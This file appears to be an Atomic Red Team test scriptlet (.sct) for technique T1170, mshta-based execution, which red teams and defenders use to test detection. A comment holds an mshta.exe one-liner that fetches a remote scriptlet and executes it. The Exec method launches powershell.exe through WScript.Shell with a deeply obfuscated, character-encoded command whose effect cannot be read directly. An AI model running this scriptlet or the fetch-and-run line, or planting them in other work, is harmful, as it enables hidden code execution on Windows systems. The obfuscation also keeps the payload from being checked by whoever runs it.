<?XML version="1.0"?>
<scriptlet>
  <!-- Test -->
  <!-- mshta.exe javascript:a=(GetObject("script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/mshta.sct")).Exec();close(); -->

<registration
    description="Bandit"
    progid="Bandit"
    version="1.00"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
	>

</registration>

<public>
    <method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[

	function Exec()
	{
		var r = new ActiveXObject("WScript.Shell").Run("powershell.exe /c &( $veRbOSepRefEREncE.tostRing()[1,3]+'X'-JoIN'')(('32Q45L106A79k105P78A32~40k32e40P32Z52e57Q32@44~52A53Z32P44P5
3Q56A44e50k48k32~44_50Z55@44@50Z56Z44L54P57P44Z32~55@55e32e44P55_50@44@32L50~48A44Z32@50Z50~32P44Q54A56e44e32k55
L52~44@32L55e52@32Z44@55Z48e44A39Z51@97A39Q44@39k50@102~39A32@44e32L39~50Z102e39@32k44P51k49A44e32Z51Z48@32A44Q3
9k50A101~39@44P32_51k52@44Z32Z51Q52Q44L39P50Q101P39Z32k44k51Z50_44k32P51Z48~32L44~51_49~32A44Q39_50_101A39A32P44
Z32L51_57P32A44~51L51L44A39A50Q102Z39A32k44L32~55_48@44P32@39_54@99A39Q44A39@50k101@39@32e44e55Z48A44~32P55Q51L3
2A44Q32L54Q56_44k32k50k50k44@50e57@32_44@32e50~55L41_124P102Z79P114@69Q65k99~72P45~79L66A74k101e67e116Z32e123Q32
Z40L91P67P104P65~82A93@40k32L91L67@79k78Q118A69@82Q84k93A58L58L116k79L73Z110k84_49P54~40e32Z40L32Z36A95Z46e84@79
P115~116Q82Z105_78_103e40L41Z32k41_32@44Z49~54k32k41Z32k41@41P125L32k41Z32k124~32@105@69P88'.sPLIT('Ae_Q~PkZL@')
 | %{( [InT]$_-as[ChaR]) } ) -jOiN'')");
	}

]]>
</script>

</scriptlet>
